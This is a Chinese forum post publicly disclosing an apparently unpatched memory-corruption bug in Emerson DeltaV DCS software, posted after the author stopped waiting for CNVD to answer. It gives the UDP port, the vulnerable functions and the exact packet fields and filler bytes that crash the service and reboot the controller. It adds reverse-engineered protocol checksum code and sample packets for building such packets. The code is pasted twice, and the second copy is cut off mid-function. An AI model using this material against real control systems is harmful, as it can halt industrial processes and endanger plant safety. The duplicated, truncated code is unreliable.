-
-
Emerson deltaV DCS和组态软件内存越界漏洞
-
发表于: 2023-6-29 17:11
-
已经从原单位离职,原工作时候的漏洞没有提交给cnvd,现在闲来无事,提交了一个多月了,迟迟没有回应(估计是设备太贵了或者接触不到,cnvd没法验证该漏洞),简直就是杳无音信,不等了,伺候不起,随他去吧。
艾默生是工控行业的国际巨头之一(其他类似西门子,通用电气,霍尼韦尔,三菱等),deltav产品官网:
deltav官网,下载安装后可以复现。
该漏洞应该是一个0day,漏洞原因是网络数据可能覆盖全局地址,造成了程序不可预期的执行结果,更深一步的漏洞利用,暂时未做研究。
(一) 环境
1. emerson deltav 组态软件IP:10.4.0.6,DCS IP: 10.4.0.10,攻击机IP:10.4.0.9
2. emerson deltav dcs 进程DVCommService.exe,漏洞代码位于comm.dll中,漏洞程序使用了udp端口18507
3. 攻击前确保目标和攻击机之间的通信是畅通的
(二) 漏洞触发
漏洞触发时截图:
崩溃代码地址:comm.dll 0x20116c50函数中的偏移地址0x20116d62:
崩溃原因:访问了0XCDCDCDCD这个内存地址,该地址来自于攻击载荷:
该函数的上级调用者是oss.dll中20017B40函数(跟漏洞无直接关系):
(三) POC原理以及说明
通过分析,comm.dll中的201148A0函数调用recv函数,接收cmd(偏移为4)为7数据包后,进入函数0x20111B90,获取数据包偏移16的word值后,进入多个选择的分支:
漏洞成因是,代码将数据包第20字节开始的word值作为项数n,将第24字节开始的每4字节当作一个ip地址值,依次从数据包中取出n个ip地址,填充到从内存地址RtDeviceConnectionClassDataP + 44629开始的数组中,而RtDeviceConnectionClassDataP(偏移地址0x2014A96C)是程序运行时的一个关键的全局结构体(或类),此时,该全局地址块的数据被破坏,会导致程序执行时不可预测的结果,此处表现为内存地址越界(0xc0000005),导致DVCommService.exe崩溃。
假如修改数据包偏移16字节处的word值(假设该字段叫做subcmd),并将数据包剩余内容填入0xcd或者0xff,即可触发漏洞。
通过动态调试,发现cmd为7,subcmd为9或者0x19的数据包被接收后,会进入20111B90第184行的流程:
通过变异subcmd的值,可以多次触发类似的漏洞。比如还可以触发0x20125db2处的内存越界访问:
POC执行时的命令参数是ip地址,如cmd中执行:Emerson.exe 10.4.0.6。
将攻击参数改为dcs的ip地址10.4.0.10,同样会导致dcs端的crash,过段时间后将会导致dcs重启:
另外,此处奉上emerson网络协议中的校验和计算代码:
#include <windows.h>#include <stdlib.h>#include <string.h>#include <stdio.h>#include <stdio.h>#include <fcntl.h>#include <sys/stat.h>#include <iostream>using namespace std;
#pragma comment(lib,"ws2_32.lib")#pragma pack(1)typedef struct
{ unsigned short flag;
unsigned short size;
unsigned short cmd;
unsigned short seq;
unsigned int tickcnt;
unsigned char v1;
unsigned char valid;
unsigned char v2;
unsigned char v3;
}EMERSON_PACK_HDR;#pragma pack()extern "C" __declspec(dllexport) unsigned short __cdecl EmersonChecksum(unsigned __int8 *a1, unsigned int a2);
#define _BYTE BYTE#define BYTE1(x) (x>>8)unsigned char byte_2013A508[512] = {
0x00, 0x00, 0x89, 0x11, 0x12, 0x23, 0x9B, 0x32, 0x24, 0x46, 0xAD, 0x57, 0x36, 0x65, 0xBF, 0x74,
0x48, 0x8C, 0xC1, 0x9D, 0x5A, 0xAF, 0xD3, 0xBE, 0x6C, 0xCA, 0xE5, 0xDB, 0x7E, 0xE9, 0xF7, 0xF8,
0x81, 0x10, 0x08, 0x01, 0x93, 0x33, 0x1A, 0x22, 0xA5, 0x56, 0x2C, 0x47, 0xB7, 0x75, 0x3E, 0x64,
0xC9, 0x9C, 0x40, 0x8D, 0xDB, 0xBF, 0x52, 0xAE, 0xED, 0xDA, 0x64, 0xCB, 0xFF, 0xF9, 0x76, 0xE8,
0x02, 0x21, 0x8B, 0x30, 0x10, 0x02, 0x99, 0x13, 0x26, 0x67, 0xAF, 0x76, 0x34, 0x44, 0xBD, 0x55,
0x4A, 0xAD, 0xC3, 0xBC, 0x58, 0x8E, 0xD1, 0x9F, 0x6E, 0xEB, 0xE7, 0xFA, 0x7C, 0xC8, 0xF5, 0xD9,
0x83, 0x31, 0x0A, 0x20, 0x91, 0x12, 0x18, 0x03, 0xA7, 0x77, 0x2E, 0x66, 0xB5, 0x54, 0x3C, 0x45,
0xCB, 0xBD, 0x42, 0xAC, 0xD9, 0x9E, 0x50, 0x8F, 0xEF, 0xFB, 0x66, 0xEA, 0xFD, 0xD8, 0x74, 0xC9,
0x04, 0x42, 0x8D, 0x53, 0x16, 0x61, 0x9F, 0x70, 0x20, 0x04, 0xA9, 0x15, 0x32, 0x27, 0xBB, 0x36,
0x4C, 0xCE, 0xC5, 0xDF, 0x5E, 0xED, 0xD7, 0xFC, 0x68, 0x88, 0xE1, 0x99, 0x7A, 0xAB, 0xF3, 0xBA,
0x85, 0x52, 0x0C, 0x43, 0x97, 0x71, 0x1E, 0x60, 0xA1, 0x14, 0x28, 0x05, 0xB3, 0x37, 0x3A, 0x26,
0xCD, 0xDE, 0x44, 0xCF, 0xDF, 0xFD, 0x56, 0xEC, 0xE9, 0x98, 0x60, 0x89, 0xFB, 0xBB, 0x72, 0xAA,
0x06, 0x63, 0x8F, 0x72, 0x14, 0x40, 0x9D, 0x51, 0x22, 0x25, 0xAB, 0x34, 0x30, 0x06, 0xB9, 0x17,
0x4E, 0xEF, 0xC7, 0xFE, 0x5C, 0xCC, 0xD5, 0xDD, 0x6A, 0xA9, 0xE3, 0xB8, 0x78, 0x8A, 0xF1, 0x9B,
0x87, 0x73, 0x0E, 0x62, 0x95, 0x50, 0x1C, 0x41, 0xA3, 0x35, 0x2A, 0x24, 0xB1, 0x16, 0x38, 0x07,
0xCF, 0xFF, 0x46, 0xEE, 0xDD, 0xDC, 0x54, 0xCD, 0xEB, 0xB9, 0x62, 0xA8, 0xF9, 0x9A, 0x70, 0x8B,
0x08, 0x84, 0x81, 0x95, 0x1A, 0xA7, 0x93, 0xB6, 0x2C, 0xC2, 0xA5, 0xD3, 0x3E, 0xE1, 0xB7, 0xF0,
0x40, 0x08, 0xC9, 0x19, 0x52, 0x2B, 0xDB, 0x3A, 0x64, 0x4E, 0xED, 0x5F, 0x76, 0x6D, 0xFF, 0x7C,
0x89, 0x94, 0x00, 0x85, 0x9B, 0xB7, 0x12, 0xA6, 0xAD, 0xD2, 0x24, 0xC3, 0xBF, 0xF1, 0x36, 0xE0,
0xC1, 0x18, 0x48, 0x09, 0xD3, 0x3B, 0x5A, 0x2A, 0xE5, 0x5E, 0x6C, 0x4F, 0xF7, 0x7D, 0x7E, 0x6C,
0x0A, 0xA5, 0x83, 0xB4, 0x18, 0x86, 0x91, 0x97, 0x2E, 0xE3, 0xA7, 0xF2, 0x3C, 0xC0, 0xB5, 0xD1,
0x42, 0x29, 0xCB, 0x38, 0x50, 0x0A, 0xD9, 0x1B, 0x66, 0x6F, 0xEF, 0x7E, 0x74, 0x4C, 0xFD, 0x5D,
0x8B, 0xB5, 0x02, 0xA4, 0x99, 0x96, 0x10, 0x87, 0xAF, 0xF3, 0x26, 0xE2, 0xBD, 0xD0, 0x34, 0xC1,
0xC3, 0x39, 0x4A, 0x28, 0xD1, 0x1A, 0x58, 0x0B, 0xE7, 0x7F, 0x6E, 0x6E, 0xF5, 0x5C, 0x7C, 0x4D,
0x0C, 0xC6, 0x85, 0xD7, 0x1E, 0xE5, 0x97, 0xF4, 0x28, 0x80, 0xA1, 0x91, 0x3A, 0xA3, 0xB3, 0xB2,
0x44, 0x4A, 0xCD, 0x5B, 0x56, 0x69, 0xDF, 0x78, 0x60, 0x0C, 0xE9, 0x1D, 0x72, 0x2F, 0xFB, 0x3E,
0x8D, 0xD6, 0x04, 0xC7, 0x9F, 0xF5, 0x16, 0xE4, 0xA9, 0x90, 0x20, 0x81, 0xBB, 0xB3, 0x32, 0xA2,
0xC5, 0x5A, 0x4C, 0x4B, 0xD7, 0x79, 0x5E, 0x68, 0xE1, 0x1C, 0x68, 0x0D, 0xF3, 0x3F, 0x7A, 0x2E,
0x0E, 0xE7, 0x87, 0xF6, 0x1C, 0xC4, 0x95, 0xD5, 0x2A, 0xA1, 0xA3, 0xB0, 0x38, 0x82, 0xB1, 0x93,
0x46, 0x6B, 0xCF, 0x7A, 0x54, 0x48, 0xDD, 0x59, 0x62, 0x2D, 0xEB, 0x3C, 0x70, 0x0E, 0xF9, 0x1F,
0x8F, 0xF7, 0x06, 0xE6, 0x9D, 0xD4, 0x14, 0xC5, 0xAB, 0xB1, 0x22, 0xA0, 0xB9, 0x92, 0x30, 0x83,
0xC7, 0x7B, 0x4E, 0x6A, 0xD5, 0x58, 0x5C, 0x49, 0xE3, 0x3D, 0x6A, 0x2C, 0xF1, 0x1E, 0x78, 0x0F
};unsigned int sub_2010CDB0(DWORD v2, unsigned int a2)
{ //int v2; // edx@1
unsigned int v3; // esi@1
unsigned __int16 v4; // cx@1
unsigned int result; // eax@7
//v2 = *(_DWORD *)(this + 28);
v3 = *(_BYTE *)(v2 + 3) + 16 + v2 + (*(_BYTE *)(v2 + 2) << 8);
v4 = *(_BYTE *)(v2 + 5) + (*(_BYTE *)(v2 + 4) << 8);
if (v4 != 2 && v4 != 6 && v4 != 14 && v4 != 22 && v4 != 23)
v3 -= 2;
result = a2 >> 8;
*(_BYTE *)v3 = BYTE1(a2);
*(_BYTE *)(v3 + 1) = (BYTE)a2;
return result;
}unsigned short __cdecl EmersonChecksum(unsigned __int8 *a1, unsigned int a2)
{ HMODULE h = LoadLibraryA("D:\\work\\vsproject\\test\\x64\\Release\\EmersonDll.dll");
if (h == 0)
{
MessageBoxA(0, "error", "error", MB_OK);
}
else {
MessageBoxA(0, "ok", "ok", MB_OK);
}
unsigned int v2; // esi@1
signed int result; // eax@1
unsigned int v4; // edx@2
unsigned short * word_2013A508 = (unsigned short *)byte_2013A508;
v2 = 0;
result = 0xFFFF;
if (a2)
{
do
{
v4 = (unsigned __int8)result ^ a1[v2++];
result = (unsigned __int16)(word_2013A508[v4] ^ ((unsigned __int16)result >> 8));
} while (v2 < a2);
}
result = ((result & 0xff) << 8) + ((result >>8)&0xff);
return result;
}int __stdcall DllMain(_In_ HINSTANCE hInstance, _In_ DWORD fdwReason, _In_ LPVOID lpvReserved) {
return true;
}void test_crc() {
int myresult = 0;
// __asm {// mov eax, 0xfffffff0// cmp eax, 8// ja __big// mov eax, 0// // jmp __toret// __big :// mov eax, 1// __toret :// mov myresult, eax// }// char pack0[] = // "\xfa\xce\x00\x42\x00\x02" \// "\x21\x2e\x00\x01\x38\xf4\x54\x80\x04\x00\x06\x01\x00\x00\x00\x00" \// "\x00\x29\x01\x68\x00\xdc\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00" \// "\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x04\x00\x00\x00\x00\x00\x00" \// "\x00\x00\x00\x0b\x00\x43\x00\x54\x00\x4c\x00\x52\x00\x2d\x00\x33" \// "\x00\x32\x00\x44\x00\x44\x00\x39\x00\x34\x00\x00\x00\x00"; //ed7f //830a unsigned char pack0[] = {
0xfa,0xce,0x00,0x42,0x00,0x02,0x21,0x2e,0x00,0x01,0x38,0xf4,0x54,0x80,0x04,0x00,
0x06,0x01,0x00,0x00,0x00,0x00,0x00,0x29,0x01,0x68,0x00,0xdc,0x00,0x00,0x00,0x00,
0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0a,0x00,0x04,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0b,0x00,0x43,0x00,0x54,0x00,0x4c,
0x00,0x52,0x00,0x2d,0x00,0x33,0x00,0x32,0x00,0x44,0x00,0x44,0x00,0x39,0x00,0x34,
0x00,0x00
};
char pack[] = "\xfa\xce\x00\x17\x00\x08\x04\xcb\x00\x00\x00\x00\x00\x80\x00\x00" \
"\xda\xc5\x00\x01\x01\x01\x00\x0f\x00\x00\x00\x2d\x66\xc2\xfc\x83" \
"\xe0\xff\xff\x8f\x80\x14\xe8";
unsigned int crc = EmersonChecksum((unsigned char*)pack, sizeof(pack) - 1 - 2);
unsigned int result = ((crc == 0x14e8) ? 1 : 0);
cout << "result:" << result << endl;
int pack0length = sizeof(pack0);
crc = EmersonChecksum((unsigned char*)pack0, pack0length);
char pack2[] = "\xfa\xce\x00\xb4\x00\x0e\x00\x00\xff\xff\x8a\xff\x10\x80\x00\x00" \
"\x18\x00\x00\x00\xda\xc5\x00\x01\xc7\xf3\x75\xc8\xbb\x73\x97\x41" \
"\x8e\x57\x88\xe8\x41\x51\x0f\x1a\x06\x06\x00\x00\x01\x02\x01\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x04\x00\x22" \
"\x00\x06\x00\x23\x00\x06\x00\x27\x00\x00\x00\x00\x00\x0f\x00\x44" \
"\x00\x45\x00\x53\x00\x4b\x00\x54\x00\x4f\x00\x50\x00\x2d\x00\x46" \
"\x00\x33\x00\x39\x00\x53\x00\x37\x00\x4b\x00\x55\x00\x00\x01\xda" \
"\xc5\x00\x01\x00\x00\x01\x90\x01\xd7\x52\x0e\x98\x6b\xa4\x50\x01" \
"\xd7\x52\x0e\x8f\x0b\x17\xe0\x01\xd7\x52\x0e\x8f\x22\xec\xb9\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x01\xd7\x4e\xe9\x98\x9b\xe8\xe0\x00" \
"\x00\x0b\xb8\x01\xd7\x52\x0e\x96\xa6\xe9\xe0\x00\x01\xd7\x52\x0e" \
"\x90\xf1\x6c\xbd\x01\xd7\x52\x0e\x90\xc2\x69\xea\x01\xd7\x4e\xe9" \
"\x98\x9e\x59\xe0\xfc\xb7";
int pack2size = sizeof(pack2) - 2 - 1;
unsigned int crc2 = EmersonChecksum((unsigned char*)pack2, sizeof(pack2) - 1 - 2);
printf("crc:%x\r\n", crc2);
return;
}#include <windows.h>#include <stdlib.h>#include <string.h>#include <stdio.h>#include <stdio.h>#include <fcntl.h>#include <sys/stat.h>#include <iostream>using namespace std;
#pragma comment(lib,"ws2_32.lib")#pragma pack(1)typedef struct
{ unsigned short flag;
unsigned short size;
unsigned short cmd;
unsigned short seq;
unsigned int tickcnt;
unsigned char v1;
unsigned char valid;
unsigned char v2;
unsigned char v3;
}EMERSON_PACK_HDR;#pragma pack()extern "C" __declspec(dllexport) unsigned short __cdecl EmersonChecksum(unsigned __int8 *a1, unsigned int a2);
#define _BYTE BYTE#define BYTE1(x) (x>>8)unsigned char byte_2013A508[512] = {
0x00, 0x00, 0x89, 0x11, 0x12, 0x23, 0x9B, 0x32, 0x24, 0x46, 0xAD, 0x57, 0x36, 0x65, 0xBF, 0x74,
0x48, 0x8C, 0xC1, 0x9D, 0x5A, 0xAF, 0xD3, 0xBE, 0x6C, 0xCA, 0xE5, 0xDB, 0x7E, 0xE9, 0xF7, 0xF8,
0x81, 0x10, 0x08, 0x01, 0x93, 0x33, 0x1A, 0x22, 0xA5, 0x56, 0x2C, 0x47, 0xB7, 0x75, 0x3E, 0x64,
0xC9, 0x9C, 0x40, 0x8D, 0xDB, 0xBF, 0x52, 0xAE, 0xED, 0xDA, 0x64, 0xCB, 0xFF, 0xF9, 0x76, 0xE8,
0x02, 0x21, 0x8B, 0x30, 0x10, 0x02, 0x99, 0x13, 0x26, 0x67, 0xAF, 0x76, 0x34, 0x44, 0xBD, 0x55,
0x4A, 0xAD, 0xC3, 0xBC, 0x58, 0x8E, 0xD1, 0x9F, 0x6E, 0xEB, 0xE7, 0xFA, 0x7C, 0xC8, 0xF5, 0xD9,
0x83, 0x31, 0x0A, 0x20, 0x91, 0x12, 0x18, 0x03, 0xA7, 0x77, 0x2E, 0x66, 0xB5, 0x54, 0x3C, 0x45,
0xCB, 0xBD, 0x42, 0xAC, 0xD9, 0x9E, 0x50, 0x8F, 0xEF, 0xFB, 0x66, 0xEA, 0xFD, 0xD8, 0x74, 0xC9,
0x04, 0x42, 0x8D, 0x53, 0x16, 0x61, 0x9F, 0x70, 0x20, 0x04, 0xA9, 0x15, 0x32, 0x27, 0xBB, 0x36,
0x4C, 0xCE, 0xC5, 0xDF, 0x5E, 0xED, 0xD7, 0xFC, 0x68, 0x88, 0xE1, 0x99, 0x7A, 0xAB, 0xF3, 0xBA,
0x85, 0x52, 0x0C, 0x43, 0x97, 0x71, 0x1E, 0x60, 0xA1, 0x14, 0x28, 0x05, 0xB3, 0x37, 0x3A, 0x26,
0xCD, 0xDE, 0x44, 0xCF, 0xDF, 0xFD, 0x56, 0xEC, 0xE9, 0x98, 0x60, 0x89, 0xFB, 0xBB, 0x72, 0xAA,
0x06, 0x63, 0x8F, 0x72, 0x14, 0x40, 0x9D, 0x51, 0x22, 0x25, 0xAB, 0x34, 0x30, 0x06, 0xB9, 0x17,
0x4E, 0xEF, 0xC7, 0xFE, 0x5C, 0xCC, 0xD5, 0xDD, 0x6A, 0xA9, 0xE3, 0xB8, 0x78, 0x8A, 0xF1, 0x9B,
0x87, 0x73, 0x0E, 0x62, 0x95, 0x50, 0x1C, 0x41, 0xA3, 0x35, 0x2A, 0x24, 0xB1, 0x16, 0x38, 0x07,
0xCF, 0xFF, 0x46, 0xEE, 0xDD, 0xDC, 0x54, 0xCD, 0xEB, 0xB9, 0x62, 0xA8, 0xF9, 0x9A, 0x70, 0x8B,
0x08, 0x84, 0x81, 0x95, 0x1A, 0xA7, 0x93, 0xB6, 0x2C, 0xC2, 0xA5, 0xD3, 0x3E, 0xE1, 0xB7, 0xF0,
0x40, 0x08, 0xC9, 0x19, 0x52, 0x2B, 0xDB, 0x3A, 0x64, 0x4E, 0xED, 0x5F, 0x76, 0x6D, 0xFF, 0x7C,
0x89, 0x94, 0x00, 0x85, 0x9B, 0xB7, 0x12, 0xA6, 0xAD, 0xD2, 0x24, 0xC3, 0xBF, 0xF1, 0x36, 0xE0,
0xC1, 0x18, 0x48, 0x09, 0xD3, 0x3B, 0x5A, 0x2A, 0xE5, 0x5E, 0x6C, 0x4F, 0xF7, 0x7D, 0x7E, 0x6C,
0x0A, 0xA5, 0x83, 0xB4, 0x18, 0x86, 0x91, 0x97, 0x2E, 0xE3, 0xA7, 0xF2, 0x3C, 0xC0, 0xB5, 0xD1,
0x42, 0x29, 0xCB, 0x38, 0x50, 0x0A, 0xD9, 0x1B, 0x66, 0x6F, 0xEF, 0x7E, 0x74, 0x4C, 0xFD, 0x5D,
0x8B, 0xB5, 0x02, 0xA4, 0x99, 0x96, 0x10, 0x87, 0xAF, 0xF3, 0x26, 0xE2, 0xBD, 0xD0, 0x34, 0xC1,
0xC3, 0x39, 0x4A, 0x28, 0xD1, 0x1A, 0x58, 0x0B, 0xE7, 0x7F, 0x6E, 0x6E, 0xF5, 0x5C, 0x7C, 0x4D,
0x0C, 0xC6, 0x85, 0xD7, 0x1E, 0xE5, 0x97, 0xF4, 0x28, 0x80, 0xA1, 0x91, 0x3A, 0xA3, 0xB3, 0xB2,
0x44, 0x4A, 0xCD, 0x5B, 0x56, 0x69, 0xDF, 0x78, 0x60, 0x0C, 0xE9, 0x1D, 0x72, 0x2F, 0xFB, 0x3E,
0x8D, 0xD6, 0x04, 0xC7, 0x9F, 0xF5, 0x16, 0xE4, 0xA9, 0x90, 0x20, 0x81, 0xBB, 0xB3, 0x32, 0xA2,
0xC5, 0x5A, 0x4C, 0x4B, 0xD7, 0x79, 0x5E, 0x68, 0xE1, 0x1C, 0x68, 0x0D, 0xF3, 0x3F, 0x7A, 0x2E,
0x0E, 0xE7, 0x87, 0xF6, 0x1C, 0xC4, 0x95, 0xD5, 0x2A, 0xA1, 0xA3, 0xB0, 0x38, 0x82, 0xB1, 0x93,
0x46, 0x6B, 0xCF, 0x7A, 0x54, 0x48, 0xDD, 0x59, 0x62, 0x2D, 0xEB, 0x3C, 0x70, 0x0E, 0xF9, 0x1F,
0x8F, 0xF7, 0x06, 0xE6, 0x9D, 0xD4, 0x14, 0xC5, 0xAB, 0xB1, 0x22, 0xA0, 0xB9, 0x92, 0x30, 0x83,
0xC7, 0x7B, 0x4E, 0x6A, 0xD5, 0x58, 0x5C, 0x49, 0xE3, 0x3D, 0x6A, 0x2C, 0xF1, 0x1E, 0x78, 0x0F
};unsigned int sub_2010CDB0(DWORD v2, unsigned int a2)
{ //int v2; // edx@1
unsigned int v3; // esi@1
unsigned __int16 v4; // cx@1
unsigned int result; // eax@7
//v2 = *(_DWORD *)(this + 28);
v3 = *(_BYTE *)(v2 + 3) + 16 + v2 + (*(_BYTE *)(v2 + 2) << 8);
v4 = *(_BYTE *)(v2 + 5) + (*(_BYTE *)(v2 + 4) << 8);
if (v4 != 2 && v4 != 6 && v4 != 14 && v4 != 22 && v4 != 23)
v3 -= 2;
result = a2 >> 8;
*(_BYTE *)v3 = BYTE1(a2);
*(_BYTE *)(v3 + 1) = (BYTE)a2;
return result;
}unsigned short __cdecl EmersonChecksum(unsigned __int8 *a1, unsigned int a2)
最后于 2025-3-28 18:13
被satadrover编辑
,原因:
